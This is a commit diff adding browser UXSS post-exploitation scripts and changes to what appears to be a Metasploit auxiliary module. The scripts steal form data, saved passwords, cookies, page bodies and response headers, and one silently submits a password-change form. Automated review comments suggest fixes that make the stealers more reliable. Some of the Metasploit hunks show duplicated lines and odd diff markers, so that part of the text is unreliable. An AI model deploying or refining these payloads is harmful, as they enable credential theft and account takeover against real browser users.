Add some common UXSS scripts.
parent
27889ea411
commit
7793ed4fea
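--- /dev/null
+++ b/steal_form.js
@@ -0,0 +1,33 @@
+/* steal_form.js: can be injected into a frame/window after a UXSS */
+/* exploit to steal any autofilled inputs, saved passwords, or any */
+/* data entered into a form. */
+
+/* keep track of what input fields we have discovered */
+var found = {};
+setInterval(function(){
+/* poll the DOM to check for any new input fields */
+var inputs = document.querySelectorAll('input,textarea,select');
+Array.prototype.forEach.call(inputs, function(input) {
+var val = input.value||'';
+var name = input.getAttribute('name')||'';
+var t = input.getAttribute('type')||'';
+if (input.tagName == 'SELECT') {
+try { val = input.querySelector('option:checked').value }
+catch (e) {}
+}
+if (input.tagName == 'INPUT' && t.toLowerCase()=='hidden') return;
+
+/* check if this is a valid input/value pair */
+try {
+if (val.length && name.length) {
+if (found[name] != val) {
+
+/* new input/value discovered, remember it and send it up */
+found[name] = val;
+var result = { name: name, value: val, url: window.location.href, send: true };
+(opener||top).postMessage(JSON.stringify(result), '*');
+}
+}
+} catch (e) {}
+});
+}, 200);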
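Review bot: The dedupe cache `found` is keyed by field name alone (`found[name] != val`), so a page with two fields sharing a name — a login and a sign-up form both using `password`, or any radio group — sees the value flip on every 200 ms tick and re-posts it each time, flooding the collector; keying on the element as well (a per-element marker compared against `val`, or `form index + name`) keeps one entry per field, and `Object.create(null)` instead of `{}` avoids a field named `__proto__` or `constructor` colliding with `Object.prototype`. Unchecked checkboxes and radios still report their `value` attribute (usually `on`), so `if ((t.toLowerCase()=='checkbox'||t.toLowerCase()=='radio') && !input.checked) return;` next to the hidden-input check keeps that noise out of the results. The `'*'` target origin is appropriate while the opener is the module's own page, but the header comment should note that the data goes to whatever window actually opened or framed this one.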
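--- /dev/null
+++ b/steal_headers.js
@@ -0,0 +1,17 @@
+/* steal_headers.js: can be injected into a frame/window after a UXSS */
+/* exploit to steal the response headers of the loaded URL. */
+
+/* send an XHR request to our current page */
+var x = new XMLHttpRequest;
+x.open('GET', window.location.href, true);
+x.onreadystatechange = function() {
+/* when the XHR request is complete, grab the headers and send them back */
+if (x.readyState == 2) {
+(opener||top).postMessage(JSON.stringify({
+headers: x.getAllResponseHeaders(),
+url: window.location.href,
+send: true
+}), '*');
+}
+};
+x.send();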
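Review bot: `getAllResponseHeaders()` never returns `Set-Cookie` or `Set-Cookie2` — XHR filters them — so the header comment promising "the response headers of the loaded URL" overstates what this captures; it should say the *exposed* headers of a fresh GET to the current URL, which may also differ from the originally loaded response (rotated CSRF tokens, cache headers, or a different document entirely if the page was the result of a POST). Once readyState 2 has fired the request goes on to download the whole body for nothing, so `x.abort();` right after the `postMessage` call stops that and guarantees a single message.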
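--- /dev/null
+++ b/submit_form.js
@@ -0,0 +1,36 @@
+/* submit_form.js: can be injected into a frame/window after a UXSS */
+/* exploit to modify and submit a form in the target page. */
+
+/* modify this hash to your liking */
+var formInfo = {
+
+/* CSS selector for the form you want to submit */
+selector: 'form[action="/update_password"]',
+
+/* inject values into some input fields */
+inputs: {
+'user[new_password]': 'pass1234',
+'user[new_password_confirm]': 'pass1234'
+}
+}
+
+var c = setInterval(function(){
+/* find the form... */
+var form = document.querySelector(formInfo.selector);
+if (!form) return;
+
+/* loop over every input field, set the value as specified. */
+Array.prototype.forEach.call(form.elements, function(input) {
+var inject = formInfo.inputs[input.name];
+if (inject) input.setAttribute('value', inject);
+});
+
+/* submit the form and clean up */
+form.submit();
+clearInterval(c);
+
+/* report back */
+var message = "Form submitted to "+form.getAttribute('action');
+var url = window.location.href;
+(opener||top).postMessage(JSON.stringify({message: message, url: url}), '*');
+}, 100);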
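Review bot: `input.setAttribute('value', inject)` changes the default value, not the current one, so it is ignored for a `<textarea>`, a `<select>`, or any input the user or browser autofill has already filled in, and the form is then submitted with the old value; `input.value = inject;` sets what is actually sent. The `if (inject)` guard also skips an intentionally empty string, so `if (Object.prototype.hasOwnProperty.call(formInfo.inputs, input.name)) input.value = formInfo.inputs[input.name];` covers both cases. `form.submit()` starts a navigation, so posting the report message before calling it is the safer order in case the window is torn down first.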
@ -53,6 +53,11 @@ class Metasploit3 < Msf::Auxiliary
false,
false,
"Bypass URLs that have X-Frame-Options by using a one-click popup exploit.",
"Bypass URLs that have X-Frame-Options by using a one-click popup exploit.",
false
false
]),
OptBool.new('CLOSE_POPUP', [
false,
"When BYPASS_XFO is enabled, this closes the popup window after exfiltration.",
true
])
])
], self.class)
], self.class)
end
end
@ -76,8 +81,11 @@ class Metasploit3 < Msf::Auxiliary
var received = [];
var received = [];
window.addEventListener('message', function(e) {
window.addEventListener('message', function(e) {
if (bypassXFO && received[JSON.parse(e.data).i]) return;
var data = JSON.parse(e.data);
if (!data.send) {
if (bypassXFO && data.i && received[data.i]) return;
if (bypassXFO && e.data) received.push(true);
if (bypassXFO && e.data) received.push(true);
}
var x = new XMLHttpRequest;
var x = new XMLHttpRequest;
x.open('POST', window.location, true);
x.open('POST', window.location, true);
x.send(e.data);
x.send(e.data);
@ -105,12 +113,14 @@ class Metasploit3 < Msf::Auxiliary
function attack(target, n, i, cachedN) {
function attack(target, n, i, cachedN) {
var exploit = function(){
var exploit = function(){
window.open('\\u0000javascript:if(document&&document.body){(opener||top).postMessage(JSON.stringify({cookie:document'+
window.open('\\u0000javascript:if(document&&document.body){(opener||top).postMessage('+
'.cookie,url:location.href,body:document.body.innerHTML,i:'+(i||0)+'}),"*");'+
'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+
'#{datastore['CUSTOM_JS']||''};}void(0);', n);
'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(datastore['CUSTOM_JS'])}"'+
'));}void(0);', n);
}
}
if (!n) {
if (!n) {
n = cachedN || randomString();
n = cachedN || randomString();
var closePopup = #{datastore['CLOSE_POPUP']};
var w = window.open(target, n);
var w = window.open(target, n);
var deadman = setTimeout(function(){
var deadman = setTimeout(function(){
clearInterval(clear);
clearInterval(clear);
@ -119,15 +129,19 @@ class Metasploit3 < Msf::Auxiliary
}, 10000);
}, 10000);
var clear = setInterval(function(){
var clear = setInterval(function(){
if (received[i]) {
if (received[i]) {
if (i < targets.length-1) {
try{ w.stop(); }catch(e){}
try{ w.stop(); }catch(e){}
try{ w.location='data:text/html,<p>Loading...</p>'; }catch(e){}
try{ w.location='data:text/html,<p>Loading...</p>'; }catch(e){}
}
clearInterval(clear);
clearInterval(clear);
clearInterval(clear2);
clearInterval(clear2);
clearTimeout(deadman);
clearTimeout(deadman);
if (i < targets.length-1) {
if (i < targets.length-1) {
setTimeout(function(){ attack(targets[i+1], null, i+1, n); },100);
setTimeout(function(){ attack(targets[i+1], null, i+1, n); },100);
} else {
} else {
w.close();
if (closePopup) w.close();
}
}
}
}
}, 50);
}, 50);
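Review bot: The third hunk drops the `||''` fallback the old `#{datastore['CUSTOM_JS']||''}` interpolation had, so with CUSTOM_JS unset `Rex::Text.encode_base64` is handed `nil`; unless that helper stringifies its argument the module raises while building the page, so `Rex::Text.encode_base64(datastore['CUSTOM_JS'].to_s)` keeps the default case working. Base64-wrapping the user script is the right move — a `'` or newline in CUSTOM_JS can no longer break the generated `javascript:` URL — and `eval(atob(""))` is a no-op when empty, so nothing else there needs to change. In the second hunk the listener still runs `JSON.parse(e.data)` on any window message with no guard, so one stray non-JSON message from a target page throws out of the handler and that target's result is lost; wrapping the parse in `try { var data = JSON.parse(e.data); } catch (err) { return; }` keeps the harness alive. The enclosing Ruby method and the JavaScript template string both begin and end outside these hunks.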